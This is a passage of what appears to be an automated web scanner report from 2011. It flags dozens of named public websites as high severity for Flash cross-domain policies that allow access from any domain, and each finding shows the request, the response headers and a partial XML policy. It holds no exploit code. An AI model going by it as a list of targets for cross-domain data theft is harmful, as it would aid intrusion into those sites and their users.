The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: smp.adviva.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.11 (Unix) mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Tue, 17 Nov 2009 11:38:46 GMT
ETag: "c20ce1-110-4788f91a4dd80"
Accept-Ranges: bytes
Content-Length: 272
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://ads.specificmedia.com -->
<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.5. http://www.43things.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.43things.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.43things.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 11 May 2005 21:41:11 GMT
Accept-Ranges: bytes
Content-Length: 204
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:13:05 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.6. http://www.about.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.about.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.about.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:24 GMT
Server: Apache
Vary: *
PRAGMA: no-cache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 13:37:24 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.specials.about.com" />
...[SNIP]...

7.7. http://www.accesshollywood.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accesshollywood.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.accesshollywood.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Content-Type: application/xml
Content-Length: 232
X-Aicache-OS: 64.210.193.113:80
Expires: Sat, 02 Apr 2011 13:45:42 GMT
Date: Sat, 02 Apr 2011 13:45:42 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 13:45:42 GMT; path=/
Vary: User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" heade
...[SNIP]...

7.8. http://www.accuweather.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.accuweather.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=7200
Content-Length: 1403
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 20:00:39 GMT
Accept-Ranges: bytes
ETag: "c28f298dc2a9ca1:322cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:43:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.accuweather.com" />
<allow-access-from domain="*.accuweatherchannel.com" />
<allow-access-from domain="*.discovery.com" />
<allow-access-from domain="*.oddcast.com" />
<allow-access-from domain="*.ucview.com" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.adcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dartmotif.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="maps.google.com" />
<allow-access-from domain="maps.yahooapis.com"/>
<allow-access-from domain="spm161.brinkster.net" />
<allow-access-from domain="www.dotglu.com" />
<allow-access-from domain="www.johnfrieda.com" />
<allow-access-from domain="www.travelboards.com" />
<allow-access-from domain="www.topix.com"/>
<allow-access-from domain="66.42.146.50" />
<allow-access-from domain="66.42.146.66" />
<allow-access-from domain="68.167.121.226" />
...[SNIP]...

7.9. http://www.addictinggames.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addictinggames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.addictinggames.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 Resin/3.1.9 PHP/5.3.1
Last-Modified: Fri, 11 Feb 2011 23:55:49 GMT
Accept-Ranges: bytes
Content-Length: 421
Cache-Control: public, max-age=86400
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:35:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <!-- meta policy -->
   <site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.10. http://www.adriver.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adriver.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adriver.ru

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:32 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 08:34:06 GMT
ETag: "458c0d-ef-4928f92b29b80"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*" to-ports="80"/>
   <allow-http-request-headers-from domain="
...[SNIP]...

7.11. http://www.ajc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ajc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ajc.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 100
Content-Type: text/xml
Cache-Control: max-age=1
Date: Sat, 02 Apr 2011 13:40:39 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.12. http://www.allvoices.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allvoices.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 17:01:16 GMT
ETag: "578d4b-65-49fca3dce8f00"
Accept-Ranges: bytes
Content-Length: 101
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.13. http://www.ally.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ally.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ally.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=8
X-UA-Compatible: IE=8
Date: Sat, 02 Apr 2011 13:43:18 GMT
Content-Length: 279
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.14. http://www.ancestry.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ancestry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ancestry.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: VARSESSION=S=2To6XE41OEWVVJSHFtyXpg%3d%3d&SLI=0&FIRSTSESSION=1&ITT=0; domain=.ancestry.com; path=/
Set-Cookie: ANCUUID=jSELjk5wn-UrtNkDbm1ZoC; domain=.ancestry.com; expires=Wed, 02-Apr-2031 13:23:58 GMT; path=/
Set-Cookie: ATT=0; domain=.ancestry.com; path=/
Set-Cookie: ANCATT=0; domain=.ancestry.com; path=/
Set-Cookie: SAC=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
Set-Cookie: RMEATT=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
Set-Cookie: VARS=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
X-AspNet-Version: 4.0.30319
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI NAV INT PRE"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:23:57 GMT
Connection: close
Content-Length: 227

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.15. http://www.answerstv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerstv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.answerstv.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 13 Oct 2008 07:24:02 GMT
Accept-Ranges: bytes
ETag: "0d579aa42dc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:06 GMT
Connection: close
Content-Length: 355

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.16. http://www.apartmenthomeliving.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.apartmenthomeliving.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apartmenthomeliving.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:34 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 13:52:12 GMT
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.17. http://www.apartments.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.apartments.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apartments.com

Response

HTTP/1.1 200 OK
Content-Length: 320
Content-Type: text/xml
Last-Modified: Thu, 29 May 2008 18:49:26 GMT
Accept-Ranges: bytes
ETag: "7d3deb7bcc1c81:0"
Server: Microsoft-IIS/7.5
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:18 AM&lastactivitytime=4/2/2011 8:45:18 AM&visitid=0492ebbb-7f02-49b1-a38b-6abeb3a067f1&visitorid=71dabbfe-f70f-42a7-a087-3839130837e5&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:18 GMT; path=/
Set-Cookie: AptAff=bcebc5f18797507fbea1f95dd9c16e6f175b4a5d707036d32d014473ac89b5b1;Path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:18 AM&lastactivitytime=4/2/2011 8:45:18 AM&visitid=0492ebbb-7f02-49b1-a38b-6abeb3a067f1&visitorid=71dabbfe-f70f-42a7-a087-3839130837e5&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:18 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:18 GMT
Connection: close
Set-Cookie: aptspersistence=578884780.24576.0000; path=/

<?xml version="1.0"?>
<!-- http://gdata.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
...[SNIP]...

7.18. http://www.archive.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.archive.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.archive.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.32
Date: Sat, 02 Apr 2011 13:36:06 GMT
Content-Type: text/xml
Content-Length: 78
Last-Modified: Tue, 08 Mar 2011 00:34:01 GMT
Connection: close
Expires: Sat, 02 Apr 2011 19:36:06 GMT
Cache-Control: max-age=21600
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>


7.19. http://www.askmen.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.askmen.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Last-Modified: Fri, 01 May 2009 14:10:22 GMT
ETag: "4d6cce-d3-468da5f967d54"-gzip
ServerHost: (null)
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:26:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:26:34 GMT
Content-Length: 211
Connection: close
Set-Cookie: NSC_btlnfo_iuuq_wjq=ffffffff090f1b3545525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

7.20. http://www.atom.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.atom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atom.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"138-1300820240000"
Last-Modified: Tue, 22 Mar 2011 18:57:20 GMT
Content-Type: text/xml
Content-Length: 138
INFO_HOST: www.atom.com
Cache-Control: max-age=837
Expires: Sat, 02 Apr 2011 14:11:37 GMT
Date: Sat, 02 Apr 2011 13:57:40 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:57:40 GMT; path=/
Vary: User-Agent

<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.21. http://www.babelgum.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.babelgum.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babelgum.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
ETag: "f6804c-d0-490c48be6ef80"
Server: Apache/2.2.16
Age: 228561
Date: Sat, 02 Apr 2011 13:41:19 GMT
Last-Modified: Tue, 21 Sep 2010 12:55:42 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.22. http://www.biblegateway.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.biblegateway.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:34:50 GMT
Content-Type: text/xml; charset=utf-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Thu, 31 Mar 2011 20:34:45 GMT
ETag: "9d7bf-cd-39486340"
Accept-Ranges: bytes
Content-Length: 205

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.23. http://www.bigpoint.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigpoint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bigpoint.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:54:03 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2010 10:20:15 GMT
ETag: "12cc6f-67-493fb277695c0"
Accept-Ranges: bytes
Content-Length: 103
Vary: Accept-Encoding,User-Agent
Content-Type: application/xml
X-XTM-Node: pool-03-www-017033
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.24. http://www.bizjournals.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bizjournals.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 17:11:42 GMT
ETag: "cc-48d671c40cf80"
Accept-Ranges: bytes
Content-Length: 204
ServerID: 8
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.25. http://www.blackberry.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:46 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 21:59:07 GMT
ETag: "11eadd1-c7-496d91d17a0c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.26. http://www.blogs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogs.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 14:07:11 GMT
Server: Apache
Last-Modified: Wed, 16 Feb 2011 20:12:27 GMT
ETag: "b94708-eb-49c6be65b00c0"
Accept-Ranges: bytes
Content-Length: 235
Vary: Accept-Encoding
Content-Type: text/xml
Content-Language: en

<?xml version="1.0"?>
       

    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       

    <cross-domain-policy>
       

    <allow-access-from domain="*" />
...[SNIP]...

7.27. http://www.bloomberg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bloomberg.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Expires: Sun, 01 Apr 2012 13:23:23 GMT
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Wed, 07 Jul 2010 19:36:53 GMT
ETag: W/"ff-4c34d755"
Date: Sat, 02 Apr 2011 13:23:23 GMT
Content-Length: 255
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-header
...[SNIP]...

7.28. http://www.boostmobile.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boostmobile.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boostmobile.com

Response

HTTP/1.1 200 OK
Content-Length: 220
Content-Type: text/xml
Last-Modified: Fri, 29 May 2009 18:38:10 GMT
Accept-Ranges: bytes
ETag: "e9bbdb9d8ce0c91:13e3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: https://apps.boostmobile.com
Date: Sat, 02 Apr 2011 13:37:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cr
...[SNIP]...

7.29. http://www.bravotv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bravotv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bravotv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Varnish: 424538094
Content-Type: text/xml
Varnish-X-Cache: MISS
ETag: "1f70023-13e-48d3cc9cc3480"
Last-Modified: Sat, 07 Aug 2010 14:42:10 GMT
Content-Length: 318
Cache-Control: max-age=281
Date: Sat, 02 Apr 2011 13:40:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.30. http://www.break.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.break.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.break.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Jun 2006 02:53:41 GMT
ETag: "3ed36e13f090c61:b41f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 157
Date: Sat, 02 Apr 2011 12:38:46 GMT
X-Varnish: 396558551 396540669
Age: 124
Via: 1.1 varnish
Connection: close
X-Varnish-Host: varnish03
X-Client-IP: 173.193.214.243
X-Country: US

<?xml version="1.0"?>
<!-- http://content.break.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.31. http://www.buzznet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.buzznet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:25 GMT
Server: Apache
